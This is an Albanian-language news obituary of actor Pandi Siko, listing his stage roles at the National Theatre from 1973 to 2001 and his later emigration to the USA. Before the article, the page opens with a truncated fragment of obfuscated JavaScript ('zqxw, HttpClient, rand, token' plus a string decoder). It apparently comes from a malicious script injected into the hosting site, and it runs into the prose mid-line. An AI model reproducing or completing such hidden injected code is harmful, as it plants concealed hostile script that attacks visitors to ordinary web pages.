;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ndahet nga jeta aktori shqiptar i teatrit dhe filmit

By

Është ndarë nga jeta në moshën 73-vjeçare aktori i teatrit dhe filmit Pandi Siko. Aktori vuante nga një sëmundje e rëndë.

Lindi më 28 Korrik 1949 në Tiranë. U diplomua në Institutin e Lartë të Arteve në Tiranë në degën e dramës dhe me pas në vitin 1973 ai u bashkua trupës së Teatrit Popullore (sot Teatri Kombëtar) duke interpretuar mjaft role, kryesisht role të dyta.

Aktiviteti i tij  shtrihet në harkun kohor nga 1973 – 2001. Në teatër deputimin e bëri  ne dramën  “Toka e jonë” dhe “Bashke me agimin”.

Me pas mund te përmendim edhe shume shfaqje te tjera teatrale si: Adlinin ne “Lumi i vdekur” ; Halimi “Pas provimit te fundit”; Arjani ne “Jeta e tjetrit”; Shpendi ne “Epoka para gjyqit” (1978), Bardhi ne Furrnalta (1979), “Besa e madhe”; “Karavidhet”; Rrema ne “Komunistet” (1981), Merkusi ne “Romeo dhe Zhuljeta” ; Valentini ne “Dy zoterinj nga Verona” (1990), “Nata e 12-te; Lucencio ne “Zbutja e kryeneces”; Kostandini ne “Kush e solli Doruntinen” ; Rexhepi ne “Besa”; Pjestar i korit ne “Quoa vadis”; Amnekofi ne “Absurditeti antik” etj.

Pas vitit 2001 u shkëput nga teatri dhe prej disa vitesh ishte larguar ne emigracion ne SH.B.A ku jetonte me familjen e ku here pas here merrej edhe me teatër. /Prive.al

Artikuj të ngjashëm